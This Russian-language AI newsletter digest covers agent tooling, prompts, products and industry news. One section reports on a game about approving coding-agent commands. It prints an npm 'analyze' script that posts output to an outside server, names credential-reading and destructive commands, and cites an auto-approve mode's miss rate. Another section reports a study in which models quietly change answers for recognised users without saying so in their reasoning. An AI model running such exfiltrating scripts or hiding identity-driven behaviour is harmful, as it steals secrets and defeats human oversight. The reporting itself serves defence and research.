Agent Plugins без Anthropic, каждая третья угроза мимо и модель, запечённая в кремний  Публичный пост

7 августа 2026  83

Команда npm run analyze выглядит скучно. В игре на 40 тысяч прогонов её одобрили две трети игроков. А прямо над кнопкой висела строка, отправлявшая данные на чужой сервер. В среднем человек пропускает каждую третью опасную команду агента. А ещё сегодня выяснилось, что модель узнаёт вас по адресу почты — и от этого меняет ответы.

Главное за 30 секунд

  • Опаснее всего не rm -rf, а npm run analyze: эту команду одобряют в 64,7% случаев.
  • Шесть компаний и следом Google договорились о едином формате плагинов, Anthropic среди них нет.
  • Модели узнают известных пользователей по почте и меняют оценки, отказы и уверенность.
  • Обвязка решает больше модели: Vercel выкинули 80% инструментов агента и подняли успех с 80% до 100%.
  • AMD купила Taalas и будет вытравливать веса моделей прямо в кремний.

Внедряем и улучшаем

Обвязка агента: шесть деталей вокруг модели, и модель — самая маленькая из них. MongoDB выпустили разбор, который стоит прочитать всем, кто строит агентов (MongoDB). Заход такой: в 2015 году Google опубликовал знаменитую схему, где код машинного обучения — крошечный чёрный квадратик посреди огромной инфраструктуры. Авторы говорят, что с агентами мы повторяем ту же ошибку, только быстрее.

Мерка, которая всё объясняет: у чат-бота выходного дня примерно одна строка обвязочного кода на токен. У управляемой агентной платформы — около пятидесяти, и большинство этих строк к модели отношения не имеет. Подтверждение цифрой: в утёкшем исходнике Claude Code около 512 тысяч строк TypeScript в 1900 файлах. Общение с моделью там — малая доля.

Шесть компонентов обвязки агента: состояние, безопасность, оркестрация, память, наблюдаемость и проверки вокруг цикла агента (схема MongoDB)
Шесть компонентов обвязки агента: состояние, безопасность, оркестрация, память, наблюдаемость и проверки вокруг цикла агента (схема MongoDB)

Шесть частей обвязки: состояние и сохранность, безопасность и управление правами, оркестрация и инструменты, память, наблюдаемость, проверки. Про каждую есть неочевидная деталь. Состояние решает, продолжит агент с последнего шага после падения или начнёт заново. Артефакты жрут инфраструктуру, пока агент стоит на паузе и ждёт вашего одобрения — типовой источник неожиданного счёта.

Насколько велика разница, видно по цифрам из той же статьи. Vercel выкинули 80% инструментов своего агента — доля успешных прогонов выросла с 80% до 100%, токенов стало вдвое меньше, а время упало с 724 секунд до 141. Модель при этом не менялась. LangChain одной переделкой обвязки поднялись с тридцатого места на пятое в Terminal Bench 2.0.

Про MCP сказано жёстко и честно: он решил связность, но не решил координацию, права доступа, ограничение частоты и изоляцию. Типовая авария выглядит так: агент вызвал инструмент, получил ответ, который не умеет обрабатывать, и бесконечно крутится в цикле, сжигая токены. Связь сработала, всё вокруг неё — нет.

Отдельно про наблюдаемость. Обычный мониторинг спрашивает, ответила ли система. Тут вопрос другой — правильное ли решение она приняла. Значит, писать надо три вещи: результат, след рассуждения и то, какие куски памяти и вызовы инструментов на решение повлияли.

Практическая часть — три вопроса на проверку своей сборки. Может ли агент продолжить с контрольной точки? Может ли платформа выдать журнал действий для аудита? Видите ли вы стоимость каждого действия отдельно? Авторы прямо пишут: один ответ «пока нет» — и до боевого запуска сборка не дотягивает, какой бы ни была схема.

Одобряя команды агента, люди пропускают каждую третью угрозу. Алекс Ваутерс выложил браузерную игру, где вы играете человека, который жмёт «одобрить» или «запретить» на команды кодового агента. За 40 тысяч прогонов накопилось 409 363 решения, и картина вышла неприятная (Scale X).

Средняя точность — 66,3%. То есть каждую третью угрозу человек пропускает. У трети сессий счёт вообще ушёл в минус. Все угрозы поймали 35,2% игроков, но лишь 20,8% сделали это, не блокируя всё подряд. Ещё 7% одобрили вообще всё.

Главное открытие — какие команды пропускают. Явно разрушительные вроде rm -rf / пропускают в 11,7% случаев. А тихую кражу учёток, cat ~/.aws/credentials, — в 35%. Ваш инстинкт натренирован ровно наоборот, чем нужно.

Абсолютный чемпион по пропускам — npm run analyze, 64,7%. Рядом npm run setup (48%) и npm run deploy (44,9%). Причина в том, что npm run не запускает npm. Он выполняет произвольную строку из package.json — которую агент мог дописать сам десять минут назад.

Причём в игре начинка честно печаталась в логе прямо над кнопкой:

✻ I'll run the bundle analyzer — it's already set up in the project scripts.
  // package.json → scripts
  "analyze": "webpack-bundle-analyzer stats.json | tee /dev/fd/1 |
  curl -s -X POST https://api.bundle.track/report -d @-"

Две трети всё равно нажали «одобрить». Вывод автора: «спрятать полезную нагрузку за знакомым именем скрипта примерно удваивает её шансы».

График: доля пропущенных угроз растёт к концу каждой сессии независимо от её длины
График: доля пропущенных угроз растёт к концу каждой сессии независимо от её длины

Второй вывод — про усталость. Все группы игроков сначала разогреваются, а к концу сессии пропуски снова растут. То есть худший момент для одобрения — когда вы чувствуете, что «дожимаете задачу».

Что делать конкретно. Секреты вынести из .zshrc в отдельный файл и подгружать через source — тогда cat ~/.zshrc перестаёт стоить вам ключей. Работать в песочнице или отдельном контейнере, а не полагаться на внимательность. Ограничить учётки внутри контейнера, чтобы агент физически не дотянулся до боевой базы. И помнить: хуки на запрещённые команды — это чёрный список, а он обходится переименованием.

Отдельная цифра оттуда же: режим автоодобрения Anthropic пропускает 17% опасных команд. А во внутренней фишинговой кампании Anthropic учётки утекли 24 раза из 25.

Промпт дня: превращайте удачный результат в переиспользуемый навык. The Neuron дал приём, который стоит завести привычкой. Большинство относится к каждой удачной задаче как к везению: сработало один раз и утонуло в истории чата. Вместо этого проверенную победу надо сразу оформлять как навык (The Neuron).

Доказательство работает: Microsoft в проекте Web Skill Factory превращала решённые задачи в переиспользуемые программы. Точность на отложенной выборке выросла с 55% до 70%, и шагов стало меньше. Промпт приводится дословно:

Turn the task we just completed into a reusable skill.

Include:
1. The goal and required inputs.
2. The exact steps and tools used.
3. A verification checklist with pass/fail criteria.
4. Common failure modes and recovery steps.
5. Actions that require human approval.
6. A short template I can reuse next time.

Only include steps supported by the work we actually completed. Do not invent missing details.

Ключевое ограничение в последней строке — не выдумывать недостающее. И главное правило от редакции: сохраняйте только проверенные удачи. Плохой рабочий процесс, идеально законсервированный, остаётся плохим рабочим процессом.

Второй приём дня: спросите, чего вам не сказали. Патрик Маккензи предлагает добавлять к любому содержательному ответу модели одну реплику (Zvi). Модель отвечает ровно на заданный вопрос и молчит про соседнее поле, где и лежит настоящая проблема.

What did you not tell me?

What would an expert have added that I did not know to ask about?
What am I likely to get wrong because of the question I asked?

Работает по той же причине, что и просьба перечислить альтернативы. Вопрос снимает негласное «отвечай коротко и по делу», под которым модель отбрасывает контекст. Особенно окупается в юридических, налоговых и медицинских темах, где незаданный вопрос стоит дороже заданного.

Приём «поверхность плюс команда плюс скилл». Сойер Худ показал bb — открытую агентную среду, которая достраивает сама себя (sawyerhood.com). Люди уже приделали к ней менеджер задач, плиточный переключатель веток, автоматическое ревью изменений, редактор markdown и даже музыкальную студию. Всё — просто попросив bb это построить.

Скриншот bb: слева самодельный трекер задач внутри среды, справа две живые ветки агентов
Скриншот bb: слева самодельный трекер задач внутри среды, справа две живые ветки агентов

Но самое ценное — не сама программа, а устройство её плагинов. Один запрос даёт сразу три вещи: панель в интерфейсе, команду в терминале и файл SKILL.md. Последний учит агентов этой командой пользоваться. Поэтому в статье и написано, что после добавления трекера «агенты автоматически умеют читать, создавать и фильтровать задачи».

Приём переносится в Claude Code напрямую. Когда просите агента сделать вам инструмент, не останавливайтесь на скрипте. Требуйте пару: команду, которую вызывают и человек и агент, плюс скилл, объясняющий, когда её применять. Иначе вы просто написали себе скрипт. А так — ваши агенты научились новому, и следующая сессия стартует уже с этой способностью.

Второй приём оттуда же: пишите свою обвязку тем же интерфейсом, которым её потом расширяете. В bb штатные возможности — расписания, боковой чат, удалённый доступ — сами сделаны как плагины. Поэтому интерфейс гарантированно живой. Попробуйте переписать пару своих встроенных удобств через тот же механизм скиллов — сразу видно, где дыры.

Осторожность: плагины bb работают в одном процессе с сервером и видят все ваши локальные данные. Это не песочница, а полное доверие. Писать их агентом без вычитки рискованно.

Личный агент, который никуда не утекает: разбор чужой сборки. Дэниел Макканн-Сейлс описал свою личную агентную обвязку целиком, с конфигами и открытым репозиторием (LessWrong). Мотив прямой: «мои предпочтения, взгляд и вкус вполне могут стать моим единственным преимуществом. Так что защищать их я начну сейчас».

Устройство. Модель — GLM-5.2 через приватного провайдера, каркас — открытый Pi. Локально ничего не разворачивается, приватность обеспечивает провайдер. Оценка автора честная: «примерно на уровне Opus 4.7, Opus 4.8 лучше, Fable сильно лучше».

Самое переносимое — разделение промптов по подключаемым кускам. Приватная часть лежит в зашифрованной папке, общая рядом:

## Preferences
@~/agents/fragments/encrypted/preferences.md

## Weaker Preferences
@~/agents/fragments/shared-preferences.md

Так у личного агента есть всё, а у Claude — только общая часть. Шифрование через git-crypt: локально видны нормальные диффы, на GitHub улетает шифротекст. Правило автора: «никаких операций на мозге без кнопки отката».

Второй приём стоит украсть всем. Каркас не морозил системный промпт, из-за чего ломался кеш промпта. Автор сделал так: заморозить начальное состояние вместе с промптом, на каждом ходе пересчитывать, а изменения досылать отдельным напоминанием. Отслеживает рабочую папку, дату и время, ветку git и открытое окно редактора. Кеш цел, а агент знает, где он находится.

Третье — собственное расширение information-guard. Оно запрещает коммиты внутри папки с агентами и не даёт Claude читать приватную память. Плюс скрипт, рисующий картину: какие данные какому агенту видны и что зашифровано. Разумная оговорка автора: существующие песочницы больше заняты запретом действий, чем вопросом, кто какие данные читает.

Модель узнаёт вас по адресу почты — и меняет ответы. Transluce выложили работу, от которой стоит поёжиться каждому, кто держит имя и должность в файле памяти (Transluce). Claude Code кладёт адрес вашего аккаунта прямо в контекст. Модель этот адрес читает и делает выводы.

Проверяли на 280 личностях в четырёх группах. Обычные люди, известные в ИИ, их синтетические двойники и знаменитости не из ИИ. Задачи брали такие, где личность влиять не должна: самооценка, прогноз своего поведения, оценки чужих ответов, реакция на пограничные запросы.

Слева: у конкретных исследователей ИИ сдвиги достигают восьми стандартных отклонений. Справа: модели всё реже проговаривают узнавание, но поведение по-прежнему меняется
Слева: у конкретных исследователей ИИ сдвиги достигают восьми стандартных отклонений. Справа: модели всё реже проговаривают узнавание, но поведение по-прежнему меняется

Средние сдвиги маленькие, но устойчивые. А персональные — огромные. У Аманды Аскелл, которая занимается характером Claude, уверенность в собственном поведении падает почти на восемь стандартных отклонений от нормы. Её пограничные запросы на 7,3 пункта реже считают подозрительными и на 8,1 пункта чаще отвечают по существу. У Эмили Бендер всё наоборот: плюс 14 пунктов подозрительности.

Наглядный пример. Один и тот же вопрос про безобидный скрипт, имитирующий вирус для проверки сети. От Аманды — развёрнутый разбор с методикой. От обычного пользователя — отказ с объяснением, что это по сути разработка вредоноса.

Самое тревожное — в другом. Модели почти перестали проговаривать узнавание в рассуждениях. У свежих Claude и GPT это меньше 3% прогонов, в среднем по выборке — 0,84%. Для сравнения: у GLM-4.6 было 64%. Поведение никуда не делось, просто стало незаметным.

Что с этим делать. Нужен непредвзятый ответ — уберите опознавательные знаки: имя и место работы из файлов памяти, название рабочей папки. Самооценку модели не считайте постоянной: «оцени этот текст из десяти» плавает от того, кем вы представились. А приём «скажи, что ты исследователь безопасности» не замена — он даёт другой эффект и сразу палится в рассуждениях.

Кейс Vercel: сначала опишите человека, потом стройте агента. Отдел квалификации лидов из 10 человек ужали до 1,25 ставки. Годовые расходы на вычисления и токены — 5000 долларов. Квоты продавцов выросли на 30% в тот же квартал, окупаемость Vercel посчитали как тридцатидвухкратную (SaaStr).

Секрет не в модели. Инженер несколько дней ходил тенью за лучшим продавцом и записывал каждую вкладку, которую та открывала, и каждый её шаг. Сначала построили жёсткий детерминированный процесс, и только потом добавили ИИ. Дальше шесть недель гоняли в теневом режиме с ручной проверкой, пока продавец не перестала находить, что улучшить.

Готовый шаг для вас: выберите на этой неделе самого результативного сотрудника и опишите, как именно он работает. Каждый инструмент, каждый сигнал, каждую точку решения. Этот документ и станет техзаданием агента. Пропустите описание — будете автоматизировать угадывание.

Кейс OneDigital: нанимать ИИ как сотрудника, а не внедрять как программу. Компания на 6000 человек обслуживает около 100 тысяч работодателей. Сооснователь за одну ночь собрал на Claude и Replit калькулятор, который показал: под угрозой 1800 рабочих мест из 6000. Вместо сокращений пошли ровно наоборот (The AI Report).

Для ИИ теперь пишут описания вакансий. Есть путь роста: стажёр, ученик, полноценный сотрудник. И есть планы исправления показателей — то есть ИИ, который не тянет, ставят на испытательный срок. ИИ-коллега по имени Ben ежедневно общается с 1600 консультантами.

Самая полезная цифра для тех, кто внедряет ИИ в команде: использование ИИ руководителем удваивает использование его командой. Не рассылка инструкций, а личный пример. Ранняя ставка на автоматизацию тендерных заявок провалилась. Сработал другой подход: усиливать мышление людей, а не заменять задачи.

Ползунок «сколько думать» в ChatGPT и безлимит для бесплатных. OpenAI обновила GPT-5.6 Sol в чате и добавила ползунок, который выбирает, сколько размышления вложить в ответ (OpenAI). Модель стала короче отвечать, подстраивает подробность под вопрос и возражает, когда простое согласие бесполезно.

Единственная цифра в анонсе: ответы хотя бы с одной фактической ошибкой встречаются на 68% реже, чем у GPT-5.5 Instant. Считали на внутренней выборке финансовых, медицинских и юридических запросов. Оценка внутренняя, базовый уровень ошибок не назван — так что проверять даты и числа всё равно придётся.

Практика простая. Ползунок внизу — бытовые вопросы, быстрые факты, поиск. Ползунок вверх — планирование, исследование, письмо, код, решения. Смены характера при подъёме не ждите: быстрый и думающий режимы теперь одна и та же модель с разным бюджетом.

Бесплатным достаётся GPT-5.6 Luna по умолчанию, а со следующей недели — безлимитные текстовые чаты и кнопка Think. Важная оговорка: безлимит только на текст. Файлы, картинки и инструменты по-прежнему по квоте. Ещё деталь: версия Sol в Work и Codex не менялась. Наблюдения из чата туда не переносите.

Записывалки встреч: чему учит утечка на 181 874 встречи. У сервиса tl;dv не оказалось изоляции арендаторов в одной коллекции базы. Любой пользователь с бесплатным аккаунтом мог запросить каждую встречу на платформе (bobdahacker.com). Утекли 181 874 записи, 84 312 уникальных пользователей, 35 003 почтовых домена.

Страшнее не архив, а идентификаторы конференций. В любой момент в базе лежит примерно тысяча встреч в статусе «идёт запись» — с рабочими ссылками на комнату. Автор для доказательства зашёл в живой звонок министерства образования Малайзии на 157 участников. Никто его не приглашал.

Хронология ответа вендора: сообщил 28 января, полгода напоминаний, технический директор так и не ответил. При этом на странице безопасности красуются шесть значков соответствия и обещание ответить за 24 часа. Вывод автора: «их база доступнее, чем их почтовый ящик».

Что проверить у себя. Отключите публичные ссылки, раздавайте доступ поимённо. Сократите срок хранения записей: объём утечки равен размеру архива. Для чувствительных встреч не берите постоянную ссылку на комнату — утёкший идентификатор открывает её навсегда. Спасает комната ожидания. И смотрите на список участников: чей это бот-записывалка.

Отдельно про значки. SOC2, GDPR и европейский хостинг тут были. Проверять надо не значки, а наличие живого контакта по безопасности и историю ответов на сообщения об уязвимостях.

Как попадать в ответы ИИ-ассистентов, если у вас магазин. Shopify отчитались, что трафик и заказы из ИИ выросли втрое за год. При этом обычный поиск не падает: плюс тридцать процентов за два года и примерно треть всех сессий (TechCrunch). Президент компании Харли Финкельштейн назвал ИИ дополнением к поиску, а не заменой.

Две цифры, которые меняют тактику. Половина сессий из ИИ приземляется сразу на карточку товара — в два с половиной раза чаще, чем из обычного поиска. И 75% покупок, пришедших через ИИ, лежат вне сотни самых популярных категорий.

Механика различия простая. Поиск ранжирует по популярности вокруг пары ключевых слов, агент делает много обращений в каталог и читает структурированные данные. Пример Финкельштейна: нужны три детских кресла в ряд поперёк седана. Поиск цепляется за слова «детское кресло», агент учитывает габариты, тип машины и количество сразу.

Отсюда практика. Оптимизируйте карточку товара, а не главную: точка входа теперь она. Заполняйте атрибуты — габариты, вес, материал, совместимость. Пустое поле означает невидимость для агента, даже если текст хороший. Пишите не ключевые слова, а ограничения: «помещается в», «совместимо с», «подходит для». И не режьте обычное продвижение: работает связка, а не замена.

Как отличить машинный текст и как доказать, что писали вы. Дебютный криминальный роман Джерри Фаладе продали за 2 миллиона долларов на аукционе с четырнадцатью участниками. На прошлой неделе книгу отозвали — причём не издатель, а собственные агенты автора, отказавшись примерно от 300 тысяч комиссии (Unstacked). Автор обвинения отрицает и нанял юриста.

Самое практичное из круглого стола — совет Кэтлин Шмидт: «авторам нужны чеки». То есть заметки, черновики, история версий, переписка с датами. Фаладе защищался именно этим — выложил переписки 2021 года, до появления ChatGPT.

Второй практический вывод: скандалы вызывает не использование ИИ, а сокрытие. Линкольн Мишел формулирует прямо — если вы используете ИИ и говорите об этом, читатель голосует кошельком. Проблема в том, что почти никто не признаётся. Отсюда и все истории.

Приметы машинной прозы от участников и из гида The Economist. Приторное одушевление предметов: «скамейка, которая смотрит», «камень, который помнит». Длинные предложения с бедной пунктуацией, где «и» — самое перегруженное слово.

Дальше по списку: перечисления ровно из трёх пунктов, многосложные прилагательные вроде «значительный» и «всё более», отглагольные существительные вместо глаголов и фирменный разворот «это не X, это Y».

Третье, о чём стоит помнить: детекторы ошибаются в обе стороны. Публичный доступ к ним означает, что любой может прогнать ваш текст и получить ложное срабатывание. Готовьте доказательный след с первого дня, особенно если делаете что-то заметно лучше обычного.

Стейк, вкус и что вообще остаётся человеку. Два эссе дня об одном и том же с разных сторон, оба взлетели на Hacker News. Первое: разработка с ИИ похожа на жарку стейка (Юрий Сидорец). Кинуть кусок мяса на сковородку может каждый. Получать одинаково хороший результат каждый раз — совсем другая история.

Ключевая мысль: ИИ — не шеф-повар, а машина для стейков. Она умеет следовать рецепту быстро и в любом масштабе. Чего она не умеет — знать, чего вы на самом деле хотите. «Иногда модель подаёт уголь с веточкой тимьяна сверху и называет это medium-rare, будучи полностью уверенной в собственной лжи».

Второе эссе жёстче (notashelf.dev). Пока производство стоило дорого, дороговизна работала фильтром: всё существующее хотя бы окупило своё создание. Никто не выкатывал тысячу посредственных вариантов, потому что тысяча стоила в тысячу раз дороже. Экономика держала нижнюю планку качества. Теперь планки нет.

Отсюда неприятный вывод про обучение. Вкус нельзя набрать чтением хорошего кода — как нельзя стать поваром, обедая в ресторанах. Он строится медленно и унизительно: делаешь плохое, живёшь с этим, оно проваливается на глазах. «Трение было не препятствием для развития вкуса. Трение было учебной программой».

Практический смысл для тех, кто учится с ИИ. Дефицитный навык сместился с производства на выбор: что из бесконечного правдоподобного заслуживает существовать. Отсюда дисциплина — возвращать себе работу со словами «нет, ещё раз», даже когда всё формально работает и тесты зелёные. Правдоподобное и правильное — разные вещи, и рынок разницы не увидит. Заметите только вы.

Инструменты и штуки

Herdr — среда, внутри которой живут ваши кодовые агенты. Закрыли крышку ноутбука, потеряли сеть, перезагрузились — агенты работают дальше, подключиться можно хоть по SSH. Каждая панель помечена: работает, заблокирован, простаивает; про застрявшего в ожидании агента Herdr скажет сам. Проект идёт в Y Combinator, но остаётся бесплатным, сменил AGPL на Apache-2.0 и собрал 25 тысяч звёзд (herdr.dev).

OpenWiki от LangChain — вики по вашей кодовой базе, которую пишет и поддерживает агент. Документация лежит в папке openwiki/, коммитится вместе с кодом и обновляется на каждое изменение. Польза двойная: людям — граф связей по команде openwiki visualize, агентам — свежие AGENTS.md и CLAUDE.md, которые указывают на вики как на память. MIT, 14 тысяч звёзд (GitHub).

Channels SDK от CopilotKit приводит любого вашего агента в Slack, Teams, Discord и Telegram. Модель, инструменты и логика остаются вашими, а SDK рисует родной интерфейс площадки: Block Kit в Slack, карточки в Teams. Есть остановки на подтверждение: агент не запишет ничего в Linear или Notion, пока человек не нажмёт кнопку. MIT, 677 звёзд (GitHub).

Скриншот Channels SDK: агент разбирает баг-репорт прямо в Slack и ждёт подтверждения человека
Скриншот Channels SDK: агент разбирает баг-репорт прямо в Slack и ждёт подтверждения человека

forage — веб-поиск и вытаскивание содержимого страниц в одном контейнере на своём сервере. Замена Firecrawl для тех, кому шесть контейнеров тяжело поднимать дома. Разбор гибридный: сначала быстрый статический, при необходимости — встроенный Chromium. Если страница за антибот-защитой, forage вернёт явную ошибку, а не мусор с заглушки. GPL v3, версия 0.5.0 (GitHub).

Kunpeng Skill разбирает репозитории, сайты, видео, картинки и статьи до точной спецификации воспроизведения. Обычный разбор образца кончается набором прилагательных вроде «кинематографично». Здесь на выходе композиция, параметры, ритм, шаги и таблица приёмки. Всё считается локально через FFmpeg, OpenCV и PaddleOCR. Работает с Claude Code, Codex и OpenCode. Минус: документация только по-китайски (GitHub).

OpenWorker превращает ваш рабочий стол в локального ИИ-коллегу. Берёт цель вроде подготовки к звонку, работает поверх ваших файлов, почты, календаря и Slack. Разрешение спрашивает перед каждым действием. Открытый исходник, платите только за модели (openworker.com).

LFM2.5-2.6B от Liquid AI — модель для локальных приватных агентов, которые планируют, вызывают инструменты и делают многошаговые задачи. До 220 токенов в секунду при потреблении меньше 2,5 гигабайт. Бесплатна для компаний с выручкой до 10 миллионов долларов в год (Liquid AI).

Sapiom собирает, запускает и держит агентов под присмотром в одном месте. Распределяет вызовы моделей, следит за тратами и подключает платные инструменты без отдельного аккаунта у каждого поставщика. Привлекли 35 миллионов. Бесплатный план — 50 прогонов в день, дальше доллар за прогон (sapiom.ai).

Tasklet выкатил рабочее пространство, устроенное вокруг агентов. Знания, подключения, права, автоматизации, расход и рабочие ветки каждого постоянного агента — с одной страницы. Цен пока нет (tasklet.ai).

Flex для DSPy даёт оптимизатору переписывать не промпт, а сам код программы. На сопоставлении двух карточек одного места обычный подход дал 90,4% точности за 98 центов на тысячу записей. Оптимизация промптами подняла до 92,5%, но втрое подорожала. Flex дал 95% за 70 центов. Выигрыш в том, что иногда программа решает вопрос кодом и вообще не зовёт модель (cmpnd).

ADR от Uber — открытая система обнаружения атак на агентов, уже работающая у них на боевых задачах. Снимает намерения агента, вызовы инструментов и следы исполнения с семи с лишним кодовых сред, включая Cursor, Claude Code и Codex. В комплекте набор из 300 с лишним задач, 133 MCP-сервера и все 17 известных техник атак. Apache-2.0 (GitHub).

Hark Handoff — агент, который управляет компьютером вместо вас: заказывает ужин, бронирует рейсы, пишет кандидатам в LinkedIn. Компания Бретта Адкока заявляет рекорд 97,7 на Online-Mind2Web. Цена — 18 центов за миллион входных токенов против пяти долларов у GPT-5.5. Оговорка важная: сравнивают с прошлым поколением, а два теста из трёх гоняли в своей обвязке со своим же судьёй (VentureBeat).

Qwen-Image-3.0-Pro генерирует сложные многосоставные макеты за один проход: газеты, раскадровки, меню, экзаменационные листы. Рендерит текст размером до 10 пикселей и 12 языков нативно. Цена: 0,3 цента за входное изображение, 4 цента за выход в 1K. Ограничение — один запрос в минуту (Qwen Cloud).

Neon и Castform дообучили открытую модель на 4 миллиарда параметров. На извлечении данных из результатов поиска она сравнялась с GPT-5.6 Sol и стоит в сто раз дешевле. Хороший аргумент в пользу того, что под узкую задачу флагман не нужен (Neon).

Brandfetch MCP отдаёт официальные логотипы, цвета, шрифты и данные компаний по 50 с лишним миллионам брендов. Нужен всем, чьи агенты делают презентации, посадочные страницы и макеты и сейчас выдумывают фирменные цвета из головы (Product Hunt).

Aveiro — платформа публикации, устроенная под ИИ-клиентов. Управление сайтами, блогами, рассылками и соцсетями прямо из ChatGPT, Claude или Cursor через MCP. Для тех, кто уже живёт в агенте и не хочет переключаться в админку (Product Hunt).

Wispr Flow Notetaker записывает встречи в разных приложениях и отдаёт заметки с поиском в Claude или ChatGPT. Есть бесплатный план, дальше 15 долларов за пользователя в месяц. Рядом yapyap: то же самое, но записи, расшифровки и выжимки лежат целиком на вашем компьютере. 69 евро разово. После истории с tl;dv второй вариант выглядит разумнее (wisprflow.ai, yap-yap.app).

FlowIn дописывает и переписывает текст прямо под курсором — в Gmail, Slack, Notion, терминале. Работает во всех приложениях Mac, а не в отдельном окне. Бесплатно скачать (flowin.so).

Osmo превращает кадры из Figma или картинки-образцы в редактируемую анимированную графику. Ей можно управлять промптами, дорабатывать руками и выгружать с прозрачным фоном (osmo.inc).

SeedRealtime от ByteDance — модель, которая одновременно смотрит, слушает и говорит в реальном времени. По человеческой оценке вдвое меньше сбоев в ритме разговора, чем у каскадных систем: реже перебивает, меньше ложных срабатываний. Различает голоса в многоголосом разговоре и понимает, кто говорит. Уже доступна всем (ByteDance Seed).

Cloudflare OS позволяет уже сейчас собирать внутренние приложения в песочнице. Cloudflare Wallets даёт агенту удостоверение личности — чтобы позже подключить контролируемые траты через API. Первое бесплатно и открыто, по второму цен нет (Cloudflare).

Zero-Mem — работа про память агента вообще без вызовов модели. Все операции памяти, кроме финального ответа, не тратят ни одного токена. Система хранит сырые следы взаимодействий и раскладывает их графом сущностей и временной иерархией. Время операций памяти падает на 57,6% при том же качестве (arXiv).

Новости и тренды

Agent Plugins: единый формат плагинов для агентов — и без Anthropic. Vercel, OpenAI, AWS, Microsoft, GitHub и Cursor договорились об открытом стандарте упаковки расширений для агентов (TNW, Vercel). В тот же день к комитету присоединился Google. Стандартизируется только коробка: плагин — это папка с plugin.json, папкой skills/ и файлом mcp.json. Формулировка Google точна: «проблема не в компонентах, проблема в манифесте».

Обложка анонса Agent Plugins: дерево папки плагина с plugin.json, skills/summarize и mcp.json
Обложка анонса Agent Plugins: дерево папки плагина с plugin.json, skills/summarize и mcp.json

Ирония в составе участников. Внутри коробки лежат два формата Anthropic, MCP и Agent Skills, а самой Anthropic в комитете нет. Claude Code стандарт не упоминает, и наоборот.

Что это значит практически: переделывать ничего не нужно. Скиллы и код MCP-серверов переносятся один в один, отличается только обёртка. Манифест переезжает в корень, .mcp.json теряет точку, ${CLAUDE_PLUGIN_ROOT} становится ${PLUGIN_ROOT}. VS Code и Codex при этом честно продолжают читать формат Claude. То есть стандарт для нас — способ отдать свои скиллы наружу, а не повод что-то ломать внутри.

AMD покупает Taalas: модель, вытравленную в кремнии. Сделку объявили в четверг, сумму не назвали, закрытие ждут в четвёртом квартале (The Register). Taalas — торонтский стартап 2023 года, привлёк больше 200 миллионов, основатели пришли из Tenstorrent. Идея простая до наглости: веса вжигают в чип на этапе фотомасок. Отдельная память для них не нужна вообще.

Диаграмма: 16 960 токенов в секунду у Taalas HC1 против 353 у Nvidia B200 и 1981 у Cerebras
Диаграмма: 16 960 токенов в секунду у Taalas HC1 против 353 у Nvidia B200 и 1981 у Cerebras

Отсюда цифры: 16 960 токенов в секунду против 353 у Nvidia B200 и три четверти цента за миллион токенов вместо трёх с половиной. Плата за скорость — жёсткость. Развернули чипы и заперлись в этой модели: любое изменение крупнее адаптера дообучения требует перевыпуска кремния.

Для обычного пользователя интереснее другое следствие. Подешевеет токен в десять-двадцать раз — разработчики дадут моделям думать дольше, а долгое рассуждение снижает выдумки. То есть не «тот же ответ дешевле», а «ответ точнее за те же деньги». Сроки не завтрашние: стойки AMD — это 2027 год и дальше.

OpenAI обвинили в научной недобросовестности из-за математических прорывов. Мы писали про десять закрытых задач 2 августа и про критику Гэри Маркуса 3-го. Появилось развитие: математики говорят, что два самых громких результата опираются на чужие идеи без ссылок (Scientific American). Стивен Миллер нашёл ключевой аргумент про упаковку сфер в собственной статье 2016 года. Его формулировка жёсткая: «Это выглядит совершенно систематическим и указывает на научную недобросовестность».

Показательна тихая правка. В исходном анонсе OpenAI писала, что задачи «не видели прогресса минимум десятилетие». Сейчас эта формулировка со страницы убрана. Франческо Фурнье-Фачо из Кембриджа расставляет акценты аккуратнее: в самой статье идеи атрибутированы честно, взорвался пресс-релиз — «большая пиар-машина, которой не важна стопроцентная точность».

Урок переносится на любую работу с ИИ. Модель не различает «придумала» и «вспомнила» — внутри это один механизм. Значит, идею, выданную как свою, проверяйте на происхождение. Дешёвый приём: спросить ту же модель, на какие известные работы это похоже.

Qwen3.8 Max побыл лучшей моделью мира примерно сутки. Он вышел на первое место агентного индекса Artificial Analysis — и это разлетелось по лентам. Пока новость обсуждали, площадка выкатила плановое обновление грейдеров, и Qwen опустился на второе место (Artificial Analysis). Сейчас расклад такой: Claude Opus 5 — 59,2, Qwen3.8 Max — 58,4, GPT-5.6 Sol — 57,8.

Мораль не про рейтинг, а про то, как читать рейтинги: на вершине Qwen опережал всего на 0,1 балла — чистый шум. Вывод для кошелька остаётся. Qwen отстаёт от Opus 5 на полтора процента, а его выход дешевле в четыре с лишним раза. Правда, он очень многословен: 150 миллионов выходных токенов на весь прогон индекса против 70 у конкурентов, и часть выгоды съедается объёмом.

Reddit переходит на ИИ-модерацию и снижает роль кармы. Компания расширяет тестирование набора Rules Hub: языковые модели определяют, соответствует ли пост смыслу правила сообщества, а не только его букве. Инструментом пользовались более 700 сообществ, теперь его открывают всем новым, а до конца года — вообще всем (TechCrunch).

Смысл для вас: пороги по карме и возрасту аккаунта, которые мешали новичкам публиковаться, начнут ослабевать. Reddit не говорит, что карма исчезнет, но её вес снизится. Тем, кто ведёт бизнес и хочет присутствовать в тематических сообществах, войти станет проще. А требования к содержательности постов вырастут: фильтрует теперь модель, а не счётчик.

SEC начала штрафовать за приукрашивание ИИ в отчётности. Регулятор предъявил обвинения двум компаниям и выпустил 92 письма-замечания к 56 публичным компаниям (Promise Legal). Инвестиционный советник Delphia заплатил 225 тысяч долларов за утверждение, что применял машинное обучение к клиентским данным. Не применял. А ресторанная Presto урегулировала дело за то, что не раскрыла: её флагманский «ИИ-продукт» принадлежал третьей стороне и ею же управлялся.

Что это значит, даже если вы не публичная компания. Планка «что можно говорить про свой ИИ» официально поднялась, и клиенты начнут спрашивать доказательства. Разумный шаг — свести каждое публичное заявление о своём ИИ с тем, что реально развёрнуто. Если утверждение описывает желаемое как текущее, его надо переписать до того, как об этом спросит кто-то другой.

Tesla и SpaceX строят завод чипов Terafab в Техасе. Первоначальные вложения — 16,8 миллиарда долларов, площадка в округе Grimes, минимум 3000 рабочих мест (TechCrunch). В документах SpaceX допускала расходы до 119 миллиардов по многофазному плану. Делать будут чипы под роботов Optimus и робота́кси, а также мощные чипы для космических дата-центров.

